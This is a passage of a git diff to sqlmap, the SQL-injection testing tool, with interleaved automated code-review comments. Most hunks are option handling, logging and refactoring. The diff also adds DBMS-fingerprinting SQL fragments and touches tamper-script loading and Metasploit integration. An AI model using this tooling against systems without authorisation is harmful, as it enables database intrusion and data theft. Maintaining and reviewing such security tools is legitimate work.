(RAIMA_ALIASES, None, None, None), @@ -267,8 +269,8 @@ HEURISTIC_NULL_EVAL = { DBMS.ACCESS: "CVAR(NULL)", DBMS.MAXDB: "ALPHA(NULL)", - DBMS.MSSQL: "DIFFERENCE(NULL,NULL)", - DBMS.MYSQL: "QUARTER(NULL)", + DBMS.MSSQL: "IIF(1=1,DIFFERENCE(NULL,NULL),0)", + DBMS.MYSQL: "QUARTER(NULL XOR NULL)", DBMS.ORACLE: "INSTR2(NULL,NULL)", DBMS.PGSQL: "QUOTE_IDENT(NULL)", DBMS.SQLITE: "UNLIKELY(NULL)", @@ -286,6 +288,7 @@ DBMS.EXTREMEDB: "NULLIFZERO(hashcode(NULL))", DBMS.RAIMA: "IF(ROWNUMBER()>0,CONVERT(NULL,TINYINT),NULL))", DBMS.VIRTUOSO: "__MAX_NOTNULL(NULL)", + DBMS.CLICKHOUSE: "halfMD5(NULL) IS NULL", } SQL_STATEMENTS = { diff --git a/lib/core/dump.py b/lib/core/dump.py index d20584450e9..7b8fec61a19 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py 
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -79,18 +79,19 @@ def _write(self, data, newline=True, console=True, content_type=None): elif console: dataToStdout(text) - multiThreadMode = kb.multiThreadMode - if multiThreadMode: - self._lock.acquire() + if self._outputFP: + multiThreadMode = kb.multiThreadMode + if multiThreadMode: + self._lock.acquire() - try: - self._outputFP.write(text) - except IOError as ex: - errMsg = "error occurred while writing to log file ('%s')" % getSafeExString(ex) - raise SqlmapGenericException(errMsg) + try: + self._outputFP.write(text) + except IOError as ex: + errMsg = "error occurred while writing to log file ('%s')" % getSafeExString(ex) + raise SqlmapGenericException(errMsg) - if multiThreadMode: - self._lock.release() + if multiThreadMode: + self._lock.release() kb.dataOutputFlag = True @@ -102,6 +103,10 @@ def flush(self): pass def setOutputFile(self): + if conf.noLogging: + self._outputFP = None + return + self._outputFile = os.path.join(conf.outputPath, "log") try: self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb") 
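Review bot: In Dump._write the lock is taken with `self._lock.acquire()` and released only after the write, but the `except IOError` branch raises SqlmapGenericException before that point, so a failed write in multi-thread mode leaves `_lock` held and every other writer blocks. The re-indented block is a good place to fix it: give the existing `try` a `finally:` clause containing `if multiThreadMode: self._lock.release()` and drop the trailing release. The method starts outside the hunk.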
@@ -407,7 +412,18 @@ def dbTableValues(self, tableValues): if conf.api: self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE) - dumpDbPath = os.path.join(conf.dumpPath, unsafeSQLIdentificatorNaming(db)) + try: + dumpDbPath = os.path.join(conf.dumpPath, unsafeSQLIdentificatorNaming(db)) + except UnicodeError: + try: + dumpDbPath = os.path.join(conf.dumpPath, normalizeUnicode(unsafeSQLIdentificatorNaming(db))) + except (UnicodeError, OSError): + tempDir = tempfile.mkdtemp(prefix="sqlmapdb") + warnMsg = "currently unable to use regular dump directory. " + warnMsg += "Using temporary directory '%s' instead" % tempDir + logger.warning(warnMsg) + + dumpDbPath = tempDir if conf.dumpFormat == DUMP_FORMAT.SQLITE: replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db))) @@ -429,11 +445,11 @@ def dbTableValues(self, tableValues): warnMsg = "unable to create dump directory " warnMsg += "'%s' (%s). " % (dumpDbPath, getSafeExString(ex)) warnMsg += "Using temporary directory '%s' instead" % tempDir - logger.warn(warnMsg) + logger.warning(warnMsg) dumpDbPath = tempDir - dumpFileName = os.path.join(dumpDbPath, re.sub(r'[\\/]', UNSAFE_DUMP_FILEPATH_REPLACEMENT, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))) + dumpFileName = conf.dumpFile or os.path.join(dumpDbPath, re.sub(r'[\\/]', UNSAFE_DUMP_FILEPATH_REPLACEMENT, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))) if not checkFile(dumpFileName, False): try: openFile(dumpFileName, "w+b").close() 
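Review bot: The database name is joined into `dumpDbPath` as `unsafeSQLIdentificatorNaming(db)` with no separator filtering, both in the first attempt and in the `normalizeUnicode(...)` retry, whereas the table-based file name in the next hunk has `[\\/]` replaced with UNSAFE_DUMP_FILEPATH_REPLACEMENT. That name can presumably come from the remote DBMS, so a value containing path separators or `..` could place the dump directory outside `conf.dumpPath` unless it is sanitised elsewhere (not visible here). Applying the same `re.sub(r'[\\/]', UNSAFE_DUMP_FILEPATH_REPLACEMENT, ...)` to the db component would make the two consistent. The unchanged `.sqlite3` path a few lines later performs the same join without the new UnicodeError guard.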
@@ -608,7 +624,7 @@ def dbTableValues(self, tableValues): _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(column))) filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8))) warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath) - logger.warn(warnMsg) + logger.warning(warnMsg) with openFile(filepath, "w+b", None) as f: _ = safechardecode(value, True) @@ -656,7 +672,7 @@ def dbTableValues(self, tableValues): if not warnFile: logger.info(msg) else: - logger.warn(msg) + logger.warning(msg) def dbColumns(self, dbColumnsDict, colConsider, dbs): if conf.api: diff --git a/lib/core/enums.py b/lib/core/enums.py index 148c29647c2..7b096aefc8a 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -52,6 +52,7 @@ class DBMS(object): PRESTO = "Presto" ALTIBASE = "Altibase" MIMERSQL = "MimerSQL" + CLICKHOUSE = "ClickHouse" CRATEDB = "CrateDB" CUBRID = "Cubrid" CACHE = "InterSystems Cache" @@ -81,6 +82,7 @@ class DBMS_DIRECTORY_NAME(object): PRESTO = "presto" ALTIBASE = "altibase" MIMERSQL = "mimersql" + CLICKHOUSE = "clickhouse" CRATEDB = "cratedb" CUBRID = "cubrid" CACHE = "cache" @@ -104,6 +106,8 @@ class FORK(object): YELLOWBRICK = "Yellowbrick" IRIS = "Iris" YUGABYTEDB = "YugabyteDB" + OPENGAUSS = "OpenGauss" + DM8 = "DM8" class CUSTOM_LOGGING(object): PAYLOAD = 9 diff --git a/lib/core/exception.py b/lib/core/exception.py index 9111888b006..3d4d97986c7 100644 --- a/lib/core/exception.py +++ b/lib/core/exception.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ 
diff --git a/lib/core/gui.py b/lib/core/gui.py index 0ee3219fa7a..024918a3457 100644 --- a/lib/core/gui.py +++ b/lib/core/gui.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -223,7 +223,7 @@ def enqueue(stream, queue): helpmenu.add_command(label="Wiki pages", command=lambda: webbrowser.open(WIKI_PAGE)) helpmenu.add_command(label="Report issue", command=lambda: webbrowser.open(ISSUES_PAGE)) helpmenu.add_separator() - helpmenu.add_command(label="About", command=lambda: _tkinter_messagebox.showinfo("About", "Copyright (c) 2006-2021\n\n (%s)" % DEV_EMAIL_ADDRESS)) + helpmenu.add_command(label="About", command=lambda: _tkinter_messagebox.showinfo("About", "Copyright (c) 2006-2025\n\n (%s)" % DEV_EMAIL_ADDRESS)) menubar.add_cascade(label="Help", menu=helpmenu) window.config(menu=menubar) diff --git a/lib/core/log.py b/lib/core/log.py index fcd7e6f86f8..0d729fc9c20 100644 --- a/lib/core/log.py +++ b/lib/core/log.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/option.py b/lib/core/option.py index e23f51347b3..fd8eb0a951d 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ 
@@ -128,7 +128,6 @@ from lib.core.settings import SUPPORTED_DBMS from lib.core.settings import SUPPORTED_OS from lib.core.settings import TIME_DELAY_CANDIDATES -from lib.core.settings import UNION_CHAR_REGEX from lib.core.settings import UNKNOWN_DBMS_VERSION from lib.core.settings import URI_INJECTABLE_REGEX from lib.core.threads import getCurrentThreadData @@ -416,6 +415,9 @@ def retrieve(): conf.googlePage += 1 def _setStdinPipeTargets(): + if conf.url: + return + if isinstance(conf.stdinPipe, _collections.Iterable): infoMsg = "using 'STDIN' for parsing targets list" logger.info(infoMsg) @@ -433,7 +435,7 @@ def __next__(self): def next(self): try: line = next(conf.stdinPipe) - except (IOError, OSError): + except (IOError, OSError, TypeError, UnicodeDecodeError): line = None if line: @@ -475,7 +477,7 @@ def _setBulkMultipleTargets(): if not found and not conf.forms and not conf.crawlDepth: warnMsg = "no usable links found (with GET parameters)" - logger.warn(warnMsg) + logger.warning(warnMsg) def _findPageForms(): if not conf.forms or conf.crawlDepth: @@ -523,7 +525,7 @@ def _findPageForms(): if not found: warnMsg = "no forms found" - logger.warn(warnMsg) + logger.warning(warnMsg) def _setDBMSAuthentication(): """ @@ -607,16 +609,16 @@ def _setMetasploit(): warnMsg += "or more of the needed Metasploit executables " warnMsg += "within msfcli, msfconsole, msfencode and " warnMsg += "msfpayload do not exist" - logger.warn(warnMsg) + logger.warning(warnMsg) else: warnMsg = "you did not provide the local path where Metasploit " warnMsg += "Framework is installed" - logger.warn(warnMsg) + logger.warning(warnMsg) if not msfEnvPathExists: warnMsg = "sqlmap is going to look for Metasploit Framework " warnMsg += "installation inside the environment path(s)" - logger.warn(warnMsg) + logger.warning(warnMsg) envPaths = os.environ.get("PATH", "").split(";" if IS_WIN else ":") 
@@ -810,9 +812,10 @@ def _setTamperingFunctions(): raise SqlmapSyntaxException("cannot import tamper module '%s' (%s)" % (getUnicode(filename[:-3]), getSafeExString(ex))) priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__ + priority = priority if priority is not None else PRIORITY.LOWEST for name, function in inspect.getmembers(module, inspect.isfunction): - if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs": + if name == "tamper" and (hasattr(inspect, "signature") and all(_ in inspect.signature(function).parameters for _ in ("payload", "kwargs")) or inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs"): found = True kb.tamperFunctions.append(function) function.__name__ = module.__name__ @@ -926,7 +929,7 @@ def _setPreprocessFunctions(): else: try: function(_urllib.request.Request("http://localhost/")) - except: + except Exception as ex: tbMsg = traceback.format_exc() if conf.debug: @@ -940,8 +943,8 @@ def _setPreprocessFunctions(): errMsg = "function 'preprocess(req)' " errMsg += "in preprocess script '%s' " % script - errMsg += "appears to be invalid " - errMsg += "(Note: find template script at '%s')" % filename + errMsg += "had issues in a test run ('%s'). " % getSafeExString(ex) + errMsg += "You can find a template script at '%s'" % filename raise SqlmapGenericException(errMsg) def _setPostprocessFunctions(): @@ -1172,7 +1175,7 @@ def _setHTTPHandlers(): proxyString = "" proxyString += "%s:%d" % (hostname, port) - proxyHandler.proxies = {"http": proxyString, "https": proxyString} + proxyHandler.proxies = kb.proxies = {"http": proxyString, "https": proxyString} proxyHandler.__init__(proxyHandler.proxies) 
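Review bot: The new condition in _setTamperingFunctions has the shape `A and B or C`, so when `inspect.signature` exists but the function lacks a `payload` or `kwargs` parameter, evaluation falls through to `inspect.getargspec(function)`. That function was removed in Python 3.11, so a malformed tamper script raises AttributeError there instead of being skipped and reported by the existing "missing function" path. Guarding the fallback, as in `... or (hasattr(inspect, "getargspec") and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs")`, keeps the legacy branch for interpreters that still have it. The enclosing loop continues outside the hunk.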
@@ -1202,10 +1205,10 @@ def _setHTTPHandlers(): if conf.proxy: warnMsg += "with HTTP(s) proxy" - logger.warn(warnMsg) + logger.warning(warnMsg) elif conf.authType: warnMsg += "with authentication methods" - logger.warn(warnMsg) + logger.warning(warnMsg) else: handlers.append(keepAliveHandler) @@ -1358,7 +1361,7 @@ def _setHTTPAuthentication(): errMsg += "be in format 'DOMAIN\\username:password'" elif authType == AUTH_TYPE.PKI: errMsg = "HTTP PKI authentication require " - errMsg += "usage of option `--auth-pki`" + errMsg += "usage of option `--auth-file`" raise SqlmapSyntaxException(errMsg) aCredRegExp = re.search(regExp, conf.authCred) @@ -1402,7 +1405,10 @@ def _setHTTPExtraHeaders(): debugMsg = "setting extra HTTP headers" logger.debug(debugMsg) - conf.headers = conf.headers.split("\n") if "\n" in conf.headers else conf.headers.split("\\n") + if "\n" in conf.headers: + conf.headers = conf.headers.replace("\r\n", "\n").split("\n") + elif "\\n" in conf.headers: + conf.headers = conf.headers.replace("\\r\\n", "\\n").split("\\n") for headerValue in conf.headers: if not headerValue.strip(): @@ -1547,7 +1553,7 @@ def _setHTTPTimeout(): if conf.timeout < 3.0: warnMsg = "the minimum HTTP timeout is 3 seconds, sqlmap " warnMsg += "will going to reset it" - logger.warn(warnMsg) + logger.warning(warnMsg) conf.timeout = 3.0 else: @@ -1586,13 +1592,13 @@ def _createHomeDirectories(): if conf.get("outputDir") and context == "output": warnMsg = "using '%s' as the %s directory" % (directory, context) - logger.warn(warnMsg) + logger.warning(warnMsg) except (OSError, IOError) as ex: tempDir = tempfile.mkdtemp(prefix="sqlmap%s" % context) warnMsg = "unable to %s %s directory " % ("create" if not os.path.isdir(directory) else "write to the", context) warnMsg += "'%s' (%s). " % (directory, getUnicode(ex)) warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) - logger.warn(warnMsg) + logger.warning(warnMsg) paths["SQLMAP_%s_PATH" % context.upper()] = tempDir 
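Review bot: The rewritten split in _setHTTPExtraHeaders has no `else` branch, so a `conf.headers` value containing neither a newline nor a literal `\n` stays a string, and the following `for headerValue in conf.headers:` then iterates it character by character. The previous one-liner always produced a list. Ending the chain with `else:` and `conf.headers = [conf.headers]` restores that. Whether a single header can reach this function without a separator depends on option parsing outside the hunk.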
@@ -1617,7 +1623,7 @@ def _createTemporaryDirectory(): tempfile.tempdir = conf.tmpDir warnMsg = "using '%s' as the temporary directory" % conf.tmpDir - logger.warn(warnMsg) + logger.warning(warnMsg) except (OSError, IOError) as ex: errMsg = "there has been a problem while accessing " errMsg += "temporary directory location(s) ('%s')" % getSafeExString(ex) @@ -1632,7 +1638,7 @@ def _createTemporaryDirectory(): warnMsg += "make sure that there is enough disk space left. If problem persists, " warnMsg += "try to set environment variable 'TEMP' to a location " warnMsg += "writeable by the current user" - logger.warn(warnMsg) + logger.warning(warnMsg) if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir: try: @@ -1693,11 +1699,20 @@ def _cleanupOptions(): try: conf.ignoreCode = [int(_) for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.ignoreCode)] except ValueError: - errMsg = "options '--ignore-code' should contain a list of integer values or a wildcard value '%s'" % IGNORE_CODE_WILDCARD + errMsg = "option '--ignore-code' should contain a list of integer values or a wildcard value '%s'" % IGNORE_CODE_WILDCARD raise SqlmapSyntaxException(errMsg) else: conf.ignoreCode = [] + if conf.abortCode: + try: + conf.abortCode = [int(_) for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.abortCode)] + except ValueError: + errMsg = "option '--abort-code' should contain a list of integer values" + raise SqlmapSyntaxException(errMsg) + else: + conf.abortCode = [] + if conf.paramFilter: conf.paramFilter = [_.strip() for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.paramFilter.upper())] else: 
@@ -1789,6 +1804,9 @@ def _cleanupOptions(): conf.dbms = dbms if conf.dbms and ',' not in conf.dbms else None break + if conf.uValues: + conf.uCols = "%d-%d" % (1 + conf.uValues.count(','), 1 + conf.uValues.count(',')) + if conf.testFilter: conf.testFilter = conf.testFilter.strip('*+') conf.testFilter = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testFilter) @@ -1832,13 +1850,22 @@ class _(six.text_type): warnMsg = "increasing default value for " warnMsg += "option '--time-sec' to %d because " % conf.timeSec warnMsg += "switch '--tor' was provided" - logger.warn(warnMsg) + logger.warning(warnMsg) else: kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE if conf.retries: conf.retries = min(conf.retries, MAX_CONNECT_RETRIES) + if conf.url: + match = re.search(r"\A(\w+://)?([^/@?]+)@", conf.url) + if match: + credentials = match.group(2) + conf.url = conf.url.replace("%s@" % credentials, "", 1) + + conf.authType = AUTH_TYPE.BASIC + conf.authCred = credentials if ':' in credentials else "%s:" % credentials + if conf.code: conf.code = int(conf.code) @@ -2036,6 +2063,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.delayCandidates = TIME_DELAY_CANDIDATES * [0] kb.dep = None kb.disableHtmlDecoding = False + kb.disableShiftTable = False kb.dnsMode = False kb.dnsTest = None kb.docRoot = None @@ -2066,6 +2094,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.headersFp = {} kb.heuristicDbms = None kb.heuristicExtendedDbms = None + kb.heuristicCode = None kb.heuristicMode = False kb.heuristicPage = False kb.heuristicTest = None 
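Review bot: The added `if conf.url:` block assigns `conf.authType = AUTH_TYPE.BASIC` and `conf.authCred` unconditionally, so a URL carrying userinfo silently replaces an authentication type or credentials the user passed explicitly. Guarding the two assignments with `if not conf.authType:` and `if not conf.authCred:`, or raising a syntax error on the conflict, would make the precedence explicit. The userinfo is also used as-is, so percent-encoded characters in a password are forwarded undecoded; a comment stating whether that is intended would help. The enclosing function starts and ends outside the hunk.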
@@ -2084,7 +2113,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.lastParserStatus = None kb.locks = AttribDict() - for _ in ("cache", "connError", "count", "handlers", "hint", "index", "io", "limit", "liveCookies", "log", "socket", "redirect", "request", "value"): + for _ in ("cache", "connError", "count", "handlers", "hint", "identYwaf", "index", "io", "limit", "liveCookies", "log", "socket", "redirect", "request", "value"): kb.locks[_] = threading.Lock() kb.matchRatio = None @@ -2116,13 +2145,16 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.pageStable = None kb.partRun = None kb.permissionFlag = False + kb.place = None kb.postHint = None kb.postSpaceToPlus = False kb.postUrlEncode = True kb.prependFlag = False kb.processResponseCounter = 0 kb.previousMethod = None + kb.processNonCustom = None kb.processUserMarks = None + kb.proxies = None kb.proxyAuthHeader = None kb.queryCounter = 0 kb.randomPool = {} @@ -2144,6 +2176,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.smokeMode = False kb.reduceTests = None kb.sslSuccess = False + kb.startTime = time.time() kb.stickyDBMS = False kb.suppressResumeInfo = False kb.tableFrom = None @@ -2155,7 +2188,6 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.testType = None kb.threadContinue = True kb.threadException = False - kb.tlsSNI = {} kb.uChar = NULL kb.udfFail = False kb.unionDuplicates = False @@ -2196,7 +2228,7 @@ def _useWizardInterface(): while not conf.url: message = "Please enter full target URL (-u): " - conf.url = readInput(message, default=None) + conf.url = readInput(message, default=None, checkBatch=False) message = "%s data (--data) [Enter for None]: " % ((conf.method if conf.method != HTTPMETHOD.GET else None) or HTTPMETHOD.POST) conf.data = readInput(message, default=None) @@ -2207,7 +2239,7 @@ def _useWizardInterface(): if not conf.crawlDepth and not conf.forms: warnMsg += "Will search for forms" conf.forms = True - logger.warn(warnMsg) + logger.warning(warnMsg) choice = None 
@@ -2463,7 +2495,7 @@ def _setTorHttpProxySettings(): warnMsg += "Tor anonymizing network because of " warnMsg += "known issues with default settings of various 'bundles' " warnMsg += "(e.g. Vidalia)" - logger.warn(warnMsg) + logger.warning(warnMsg) def _setTorSocksProxySettings(): infoMsg = "setting Tor SOCKS proxy settings" @@ -2543,7 +2575,7 @@ def _basicOptionValidation(): if isinstance(conf.limitStart, int) and conf.limitStart > 0 and \ isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart: warnMsg = "usage of option '--start' (limitStart) which is bigger than value for --stop (limitStop) option is considered unstable" - logger.warn(warnMsg) + logger.warning(warnMsg) if isinstance(conf.firstChar, int) and conf.firstChar > 0 and \ isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar: @@ -2553,12 +2585,16 @@ def _basicOptionValidation(): if conf.proxyFile and not any((conf.randomAgent, conf.mobile, conf.agent, conf.requestFile)): warnMsg = "usage of switch '--random-agent' is strongly recommended when " warnMsg += "using option '--proxy-file'" - logger.warn(warnMsg) + logger.warning(warnMsg) if conf.textOnly and conf.nullConnection: errMsg = "switch '--text-only' is incompatible with switch '--null-connection'" raise SqlmapSyntaxException(errMsg) + if conf.uValues and conf.uChar: + errMsg = "option '--union-values' is incompatible with option '--union-char'" + raise SqlmapSyntaxException(errMsg) + if conf.base64Parameter and conf.tamper: errMsg = "option '--base64' is incompatible with option '--tamper'" raise SqlmapSyntaxException(errMsg) 
@@ -2642,13 +2678,31 @@ def _basicOptionValidation(): raise SqlmapSyntaxException(errMsg) if conf.paramExclude: + if re.search(r"\A\w+,", conf.paramExclude): + conf.paramExclude = r"\A(%s)\Z" % ('|'.join(re.escape(_).strip() for _ in conf.paramExclude.split(','))) + try: re.compile(conf.paramExclude) except Exception as ex: errMsg = "invalid regular expression '%s' ('%s')" % (conf.paramExclude, getSafeExString(ex)) raise SqlmapSyntaxException(errMsg) - if conf.cookieDel and len(conf.cookieDel): + if conf.retryOn: + try: + re.compile(conf.retryOn) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.retryOn, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + + if conf.retries == defaults.retries: + conf.retries = 5 * conf.retries + + warnMsg = "increasing default value for " + warnMsg += "option '--retries' to %d because " % conf.retries + warnMsg += "option '--retry-on' was provided" + logger.warning(warnMsg) + + if conf.cookieDel and len(conf.cookieDel) != 1: errMsg = "option '--cookie-del' should contain a single character (e.g. ';')" raise SqlmapSyntaxException(errMsg) @@ -2706,6 +2760,10 @@ def _basicOptionValidation(): errMsg = "option '--csrf-method' requires usage of option '--csrf-token'" raise SqlmapSyntaxException(errMsg) + if conf.csrfData and not conf.csrfToken: + errMsg = "option '--csrf-data' requires usage of option '--csrf-token'" + raise SqlmapSyntaxException(errMsg) + if conf.csrfToken and conf.threads > 1: errMsg = "option '--csrf-url' is incompatible with option '--threads'" raise SqlmapSyntaxException(errMsg) 
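Review bot: In the comma-list branch for `conf.paramExclude`, `re.escape(_).strip()` strips after escaping, which is the wrong order: `re.escape` turns a space into backslash-space, so a leading space survives the strip, and for a trailing space the strip removes the space but leaves the backslash. With `id, name` the generated pattern matches ` name` rather than `name`, and with a trailing space on the last item the dangling backslash escapes the closing parenthesis and the pattern fails to compile. Writing `re.escape(_.strip())` fixes both cases. `_basicOptionValidation` continues outside the hunk.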
@@ -2758,6 +2816,11 @@ def _basicOptionValidation(): errMsg = "option '--dump-format' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(DUMP_FORMAT, True)) raise SqlmapSyntaxException(errMsg) + if conf.uValues and (not re.search(r"\A['\w\s.,()%s-]+\Z" % CUSTOM_INJECTION_MARK_CHAR, conf.uValues) or conf.uValues.count(CUSTOM_INJECTION_MARK_CHAR) != 1): + errMsg = "option '--union-values' must contain valid UNION column values, along with the injection position " + errMsg += "(e.g. 'NULL,1,%s,NULL')" % CUSTOM_INJECTION_MARK_CHAR + raise SqlmapSyntaxException(errMsg) + if conf.skip and conf.testParameter: if intersect(conf.skip, conf.testParameter): errMsg = "option '--skip' is incompatible with option '-p'" @@ -2784,10 +2847,6 @@ def _basicOptionValidation(): errMsg = "value for option '--time-sec' must be a positive integer" raise SqlmapSyntaxException(errMsg) - if conf.uChar and not re.match(UNION_CHAR_REGEX, conf.uChar): - errMsg = "value for option '--union-char' must be an alpha-numeric value (e.g. 1)" - raise SqlmapSyntaxException(errMsg) - if conf.hashFile and any((conf.direct, conf.url, conf.logFile, conf.bulkFile, conf.googleDork, conf.configFile, conf.requestFile, conf.updateAll, conf.smokeTest, conf.wizard, conf.dependencies, conf.purge, conf.listTampers)): errMsg = "option '--crack' should be used as a standalone" raise SqlmapSyntaxException(errMsg) 
@@ -2813,10 +2872,13 @@ def _basicOptionValidation(): else: conf.encoding = _ - if conf.loadCookies: - if not os.path.exists(conf.loadCookies): - errMsg = "cookies file '%s' does not exist" % conf.loadCookies - raise SqlmapFilePathException(errMsg) + if conf.fileWrite and not os.path.isfile(conf.fileWrite): + errMsg = "file '%s' does not exist" % os.path.abspath(conf.fileWrite) + raise SqlmapFilePathException(errMsg) + + if conf.loadCookies and not os.path.exists(conf.loadCookies): + errMsg = "cookies file '%s' does not exist" % os.path.abspath(conf.loadCookies) + raise SqlmapFilePathException(errMsg) def initOptions(inputOptions=AttribDict(), overrideOptions=False): _setConfAttributes() diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index c22b9d11ee0..14ad4470097 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -30,6 +30,7 @@ "liveCookies": "string", "loadCookies": "string", "dropSetCookie": "boolean", + "http2": "boolean", "agent": "string", "mobile": "boolean", "randomAgent": "boolean", @@ -39,6 +40,7 @@ "authType": "string", "authCred": "string", "authFile": "string", + "abortCode": "string", "ignoreCode": "string", "ignoreProxy": "boolean", "ignoreRedirects": "boolean", @@ -54,6 +56,7 @@ "delay": "float", "timeout": "float", "retries": "integer", + "retryOn": "string", "rParam": "string", "safeUrl": "string", "safePost": "string", @@ -63,6 +66,7 @@ "csrfToken": "string", "csrfUrl": "string", "csrfMethod": "string", + "csrfData": "string", "csrfRetries": "integer", "forceSSL": "boolean", "chunked": "boolean", @@ -115,6 +119,7 @@ "uCols": "string", "uChar": "string", "uFrom": "string", + "uValues": "string", "dnsDomain": "string", "secondUrl": "string", "secondReq": "string", 
@@ -202,6 +207,7 @@ "General": { "trafficFile": "string", + "abortOnEmpty": "boolean", "answers": "string", "batch": "boolean", "base64Parameter": "string", @@ -213,6 +219,7 @@ "crawlDepth": "integer", "crawlExclude": "string", "csvDel": "string", + "dumpFile": "string", "dumpFormat": "string", "encoding": "string", "eta": "boolean", @@ -233,6 +240,8 @@ "skipWaf": "boolean", "testFilter": "string", "testSkip": "string", + "timeLimit": "float", + "unsafeNaming": "boolean", "webRoot": "string", }, @@ -241,7 +250,10 @@ "beep": "boolean", "dependencies": "boolean", "disableColoring": "boolean", + "disableHashing": "boolean", "listTampers": "boolean", + "noLogging": "boolean", + "noTruncate": "boolean", "offline": "boolean", "purge": "boolean", "resultsFile": "string", diff --git a/lib/core/patch.py b/lib/core/patch.py index c2847d1aa5c..2d29fb6ea35 100644 --- a/lib/core/patch.py +++ b/lib/core/patch.py @@ -1,11 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ import codecs +import collections +import inspect +import logging import os import random import re @@ -35,9 +38,12 @@ from lib.core.enums import PLACE from lib.core.option import _setHTTPHandlers from lib.core.option import setVerbosity +from lib.core.settings import INVALID_UNICODE_PRIVATE_AREA +from lib.core.settings import INVALID_UNICODE_CHAR_FORMAT from lib.core.settings import IS_WIN from lib.request.templates import getPageTemplate from thirdparty import six +from thirdparty.six import unichr as _unichr from thirdparty.six.moves import http_client as _http_client _rand = 0 
@@ -84,7 +90,7 @@ def _(self, *args): if match and match.group(1).upper() != PLACE.POST: PLACE.CUSTOM_POST = PLACE.CUSTOM_POST.replace("POST", "%s (body)" % match.group(1)) - # https://github.com/sqlmapproject/sqlmap/issues/4314 + # Reference: https://github.com/sqlmapproject/sqlmap/issues/4314 try: os.urandom(1) except NotImplementedError: 
@@ -93,6 +99,58 @@ def _(self, *args): else: os.urandom = lambda size: "".join(chr(random.randint(0, 255)) for _ in xrange(size)) + # Reference: https://github.com/sqlmapproject/sqlmap/issues/5727 + # Reference: https://stackoverflow.com/a/14076841 + try: + import pymysql + pymysql.install_as_MySQLdb() + except (ImportError, AttributeError): + pass + + # Reference: https://github.com/bottlepy/bottle/blob/df67999584a0e51ec5b691146c7fa4f3c87f5aac/bottle.py + # Reference: https://python.readthedocs.io/en/v2.7.2/library/inspect.html#inspect.getargspec + if not hasattr(inspect, "getargspec") and hasattr(inspect, "getfullargspec"): + ArgSpec = collections.namedtuple("ArgSpec", ("args", "varargs", "keywords", "defaults")) + + def makelist(data): + if isinstance(data, (tuple, list, set, dict)): + return list(data) + elif data: + return [data] + else: + return [] + + def getargspec(func): + spec = inspect.getfullargspec(func) + kwargs = makelist(spec[0]) + makelist(spec.kwonlyargs) + return ArgSpec(kwargs, spec[1], spec[2], spec[3]) + + inspect.getargspec = getargspec + + # Installing "reversible" unicode (decoding) error handler + def 